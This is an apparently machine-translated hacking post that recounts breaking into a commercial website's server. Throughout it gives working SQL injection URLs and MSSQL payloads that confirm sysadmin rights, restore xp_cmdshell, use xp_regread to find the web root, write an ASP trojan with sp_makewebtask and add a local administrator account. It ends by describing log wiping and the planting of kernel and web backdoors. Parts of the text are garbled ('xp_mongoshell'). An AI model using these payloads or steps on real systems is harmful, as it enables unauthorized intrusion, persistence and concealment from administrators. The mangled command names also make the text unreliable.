[Post] obtain system permissions using script-only Technology

1. How to obtain webshell through SQL injection:
Method of N. E. V. E. R: Use Database Backup to obtain webshell. Create a table and create a field in the table to save Trojan data. Use MSSQL to export the entire data and then delete the new table.
Analysis: N. E. V. E. R uses the backup database function of MSSQL. Export the data. Assume that the database contains ASP benchmarks such as <%>, export files, and save the file names in. asp format. Then the file is saved in the web path. Is the exported ASP file going to explain the statements in <%>? If some tables in the database have a <%> identifier and an error occurs, the exported ASP file will also be incorrect. However, this opportunity is not big either.
Let's take a look at the czy method.
Czy method: The preceding methods are similar to those of N. E. V. E. R. The extended stored procedure -- sp_makewebtask is used later. The function of this extended stored procedure is to export records from a table in the MSSQL database and save them as files. This method will not cause any problems because: We only read the value of a field in the table. Export the field information to generate a file. The values in this field are all just added. When you add data, debug it first. If there is no problem, add it. If it is exported, there will be no problem.
I have manually tested the above two methods. Use the SQL injection vulnerability to create a table, add data to the table, export data, and delete the table. All are SQL statements used. I will not talk about it here. You can refer to this articleArticle.

Currently, the SQL injection vulnerability is very popular on the Internet, which is also known as the SQL injection vulnerability. We can use this vulnerability to query database information across tables and databases, and upload files through the forum to obtain the Web shell of the host (these are common methods, and anti-DDoS Pro was also described in more detail ).

 

Some time ago, I conducted a security test on a large music paid website. As a result, I obtained the system administrator privilege using pure script technology. So today, I will introduce you to all the experiences and my specific ideas.

I. Click

 

Stepping on is the top priority of a server security test. We first perform port scanning on the server. I took out a very good scan written by a friend.ProgramThe speed is quite fast. You can open 2000 threads at the same time! (WTF: Good !) The Port 1-is exhausted.

 

The open ports for scanning are as follows:

 

, 80, 1433,3389

 

The results of the second scan are the same, which is almost certainly the same. After the shock wave, the network server is much safer and it is difficult to exploit system vulnerabilities. First, I analyzed: I concentrated the target on port 21 and port 1433. Now, you only need to check your luck to see if you can get a weak password (WTF: Well, it looks pretty good !) -- Unfortunately, I haven't scanned the machine that has been weak for a long time. Today, the same is true. It seems that I only have to find a way out from the website script.

 

 

 

2. Comprehensive Exploration of the website

 

Port 1433 is enabled, that is, the sqlserver service. Generally, the website is built in an ASP + MSSQL structure, and the ASP Script Injection Vulnerability is easier to find than other script vulnerabilities, the probability of a vulnerability is also relatively high. Generally, I add single quotes after the submitted parameters. If the parameters are not filtered, ie usually returns an error message.

 

I quickly found a parameter that has not been filtered.

 

Submit: http://www.something.com/script.asp? Id = 2'

 

IE returns:

 

Microsoft ole db provider for ODBC drivers error '80040e14'     [Microsoft] [odbc SQL Server Driver] [SQL Server] string ''contains unclosed quotation marks.

 

 

 

 

 

Submit: http://www.something.com/script.asp? Id = 2 and 1 = 1

 

IE returns a normal record.

 

Submit: http://www.something.com/script.asp? Id = 2 and 1 = 2

 

No record is returned for IE.

 

Now, the injection vulnerability exists. We can use this vulnerability to obtain information about the server and database. For example, if you want to check the server patch, submit the following:

 

Http://www.something.com/script.asp? Id = 2 and 1 = (select @ Version)

 

An error occurred. The error message 1 is returned by IE:

 

 

Figure 1

 

It seems that the server has been patched with SP4. "It is said that" after SP4 is played, there are also overflow programs for 80 and MSSQL SP3. However, these are "absolute secrets". It is estimated that there are few other boys except WTF. I don't have them anyway. I blackmailed him that day! Now let's continue!

 

This server is safe for us in terms of system, so I should proceed with the script. Let's take a look at the permissions of his database connection account and submit:

 

Http://www.something.com/script.asp? Id = 2 and 1 = (select is_srvrolemember ('sysadmin '))

 

The returned result is normal, which proves that the account currently connected is the server role SysAdmin permission.

 

WTF:The is_srvrolemember ('role' [, 'login']) function is used to determine whether the current user logon is a member of the specified server role. Role indicates the name of the server role to be checked. Login is optional. If it is not specified, use the login account of the current user. If login is a role member, 1 is returned. If not, 0 is returned. If role or login is invalid, null is returned.

 

I almost never sprayed a cup of tea on a computer screen. The server role of the current connection account is SysAdmin! 2:

 

 

Figure 2

 

Haha! It seems that most of the connected accounts are connected using the SA account.

 

Submit:

 

Http://www.something.com/script.asp? Id = 2 and 'sa '= (select system_user)

 

It is used to check whether the connection account is connected with SA. ie returns normal again. This proves that the connection account is actually SA, and the permission seems to be supreme.

 

WTF:When an application role is used, executing Select User will return the name of the currently used application role. To obtain the identity of a logged-on user, use the transact-SQL statement: Select system_user.

 

At this point, many people may think of using xp_mongoshell to expand the storage process to add system accounts, and then connect to the server using the terminal. This is a very good idea! I am also a member of many people! Let's try it!

 

 

 

3. Use the MSSQL Stored procedure to obtain the webshell

 

Next, let's see if xp_mongoshell has been deleted by the administrator! Submit:

 

Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell ')

 

IE returns the following information:

 

ADODB. Field error '800a0bcd'     Either BOF or EOF is "true", or the current record has been deleted. The operation required requires a current record.

 

 

 

 

 

 

 

 

 

 

 

 

It seems that xp_cmdshell has been deleted. Let's restore it to him!

 

Http://www.something.com/script.asp? Id = 2; Exec master. DBO. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll'

 

Try again to see if xp_mongoshell is recovered?

 

Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell ')

 

WTF:In a later attempt, I found that xp_mongoshell was restored? Haha, I don't know which one of them is behind?

 

NO content is returned. This proves that the Administrator renamed the dynamic link library XP log70.dll. Otherwise, it seems that there is no way to restore it directly. In this regard, I can only say two words "I am sorry "!

 

I am unwilling to take advantage of such a vulnerability. I am so eager to use it. Let's talk about his webshell first. Hum, after I get the webshell, I naturally have a way to deal with him !).

 

The following shows how to get webshell!

 

Have you read N. E. V. E. R and czy? The webshell method has been described in detail. I also wrote their methods into a program for my convenience, but it is difficult to get the absolute web path. Where can we store the generated Trojan?

 

This may be a problem that many cool people have been studying. Fortunately, I still know something about MSSQL. I have a way to get his absolute web path. Come with me. (WTF: this is definitely a very, very bright spot! You can see it clearly !)

 

Next we will use two MSSQL Stored Procedures. However, it is necessary to introduce the xp_regread extended stored procedure and the sp_makewebtask Web Assistant stored procedure: xp_regread is used to read registry information. We can use this stored procedure to obtain the absolute web path stored in the registry.

 

Sp_makewebtask is used to obtain webshell. Its main function is to export the records of tables in the database as files. You can specify the file name. Of course, this is an ASP script file! Imagine if the record in the table is saved as a scriptCodeThe exported file is the script file. Therefore, the record we add is the script code.

 

Here I don't need the method of N. E. V. E. R. The method is to export a warehouse file. The exported files are relatively large, and many garbled characters seem inconvenient, if there are ASP tags in the record and there is an error ASP code, it is not easy to do it. Most of the operations will return the error code 500, so we use the czy method, is the web job to get the shell.

 

 

 

1. How to obtain the absolute web path?

 

Haha? It took me a long time to study this problem. As we all know, many Ms items are stored in the registry. The web location can be obtained in the registry. The location is as follows:

 

HKEY_LOCAL_MACHINE \ SYSTEM \ controlset001 \ Services \ W3SVC \ param eters \ virtual roots

 

We can use the extended stored procedure xp_regread to obtain its value.

 

Exec master. DBO. xp_regread 'HKEY _ LOCAL_MACHINE ',

 

'System \ controlset001 \ Services \ W3SVC \ Parameters \ virtual roots ','/'

 

In this way, the problem is solved, and the result is retrieved. How can we return its value in IE? My method is: first create a temporary table with a field in the table, type: Char 255. Use it to save the absolute web path value. After the table is created, we use the method of reading the Registry to save the returned value in a variable. Add a record (the value of the variable) to the new table ). In this way, the path is written to the table. Submit:

 

Declare @ result varchar (255) exec master. DBO. xp_regread 'HKEY _ LOCAL_MACHINE ',

 

'System \ controlset001 \ Services \ W3SVC \ Parameters \ virtual roots ','/', @ result output insert into temporary table (temporary field name) values (@ result );--

 

Then, we will submit: 1 = (select count (*) from temporary table where temporary field Name> 1)

 

In this way, ie reports an error and returns the value of the web path just inserted. I also tried to directly use the variables to report an error and asked IE to return the value of the variable. The result failed, so I thought of the method for creating a temporary table and adding data! Finally, we will delete the created temporary table. Webshell is ready, and the work has come to an end.

 

 

 

2.How to getWebshell?

 

Czy's article has been written in great detail. So here I will simply mention it! Create a table, create a field, and add Trojan content to the field. Then, export the content through the xp_makewebtask stored procedure into an ASP script and save it in the absolute web path. Delete the temporary table again. Everything is over. For example:

 

Execute sp_makewebtask @ outputfile = 'absolute web path \ exported file name. asp ',

 

@ Query = 'select your field from the temporary table you created'

 

The result is displayed. Of course, I have all written programs, so I don't have to bother adding data in a row manually (WTF: This article has a detailed introduction! You will not be disappointed !). The methods and ideas are all written. Now let's take action.

 

Let's see if the two extended stored procedures have been deleted. If it is deleted, I do not want to live! Haha, submit:

 

Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from Master. DBO. sysobjects where name = 'xp _ regread ')

 

Submit again:

 

Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from Master. DBO. sysobjects where name = 'SP _ makewebtask ')

 

La la! Today is my New Year. All returns normal! Neither of the two stored procedures is deleted.

 

WTF Note: Generally, administrators will not delete the two, but may have little knowledge about them, so they will not pay attention to them! Crisis is here! Hey.

 

Okay. After obtaining the absolute web path. Continue table creation:

 

Http://www.something.com/script.asp? Id = 2; Create Table [DBO]. [cyfd] ([gyfd] [char] (255 ));

 

In this way, we have successfully created a table named cyfd, and added the field name gyfd of the char type and length of 255. Then, add data to the table:

 

Http://www.something.com/script.asp? Id = 2; declare @ result varchar (255) exec master. DBO. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System \ controlset001 \ Services \ W3SVC \ pa rameters \ virtual roots', '/', @ result output insert into cyfd (gyfd) values (@ result );--

 

Read the absolute web path from the registry, and insert the path to the created table. Then the absolute path of webshell is reported:

 

Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from cyfd

 

Where gyfd> 1)

 

After an error occurs, ie returns an error. We get the absolute web path "D: \ Inetpub \ wwwroot "! The success after hard work is very sweet! Sip tea! 3

 

 

Figure 3

 

Delete the created table and submit it:

 

Http://www.something.com/script.asp? Id = 2; drop table cyfd ;--

 

OK. It's much easier to do with the path. Open my webshell retrieval program and enter the vulnerability URL:Http://www.yfd.com/yfd.com? Id = 2

 

Enter the absolute path to save the trojan: D: \ Inetpub \ wwwroot.

 

I have already configured the trojan, and the code is simplified and streamlined. Only 30 lines of code are available, so that I can submit less data to the server. Speed up! The main function of a Trojan is to input content and save the input content as a file. With this trojan, we can upload some powerful script Trojans, such as marine Trojan.

 

Less than a minute. All programs have been run. Enter the corresponding path, Wahaha (WTF: The guy who wants to eat really like this "drink "? Haha !), Webshell comes, and the fastest speed generates a Marine Trojan, 4, Figure 5:

 

 

Figure 4

 

 

Figure 5

 

I live in happiness! -- WTF often says this sentence. Today it seems that I am also infected! We can still come here!

 

 

 

4. Restore xp_mongoshell and enter the system permission!

 

The following work is very simple and easy. In less than 10 minutes, I will give you an administrator account, saying that xp_mongoshell has been deleted. And it cannot be recovered. Most of the reasons are that the Administrator has deleted the xplog70.dll file or renamed it. It's okay. upload an xplog70.dll to get everything done through webshell. I soon uploaded the xplog70.dll file to the E: \ Inetpub \ wwwroot directory. Let's restore it and submit it:

 

Http://www.something.com/script.asp? Id = 2; Exec master. DBO. sp_addextendedproc 'xp _ mongoshell', 'e: \ Inetpub \ wwwroot \ xplog70.dll'

 

Recovery: supports absolute path recovery. :) 6

 

 

Figure 6

 

OK. Let's use IE to check whether it has been restored. Submit:

 

Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell ')

 

Hey. Returns normal. It has been restored. Will the following be my reference? Haha! Add account:

 

Http://www.something.com/script.asp? Id = 2; Exec master. DBO. xp_mongoshell 'net user chouyfd chouyfd1314yf/add'

 

Promote yourself as a super Administrator

 

Http://www.something.com/script.asp? Id = 2; Exec master. DBO. xp_mongoshell 'net localgroup administrators chouyfd/add'

 

Complete. Open your terminal connection program and connect to it! Haha, I finally got connected. At this point, I have successfully obtained the system administrator account of this host. 7:

 

 

Figure 7

 

The following job is to clear logs and leave a super backdoor!

 

 

 

5. post-event handling

 

After connecting to the terminal, clear IIS logs and MSSQL logs as quickly as possible.

 

At the same time, delete xp_mongoshell to him, so it is not easy to let him discover it. Then, move the xplog70.dll I uploaded to the System32 directory. I don't know what it means to change it to: msxlog32.dll (I can't find it when I killed it, haha !) Install the super Kernel Backdoor program provided by pig, and patch the vulnerable script file. At the same time, in his script program, I modified the code and submitted specific parameters (post prompt mode) to display my web backdoor program! These two backdoors are safe!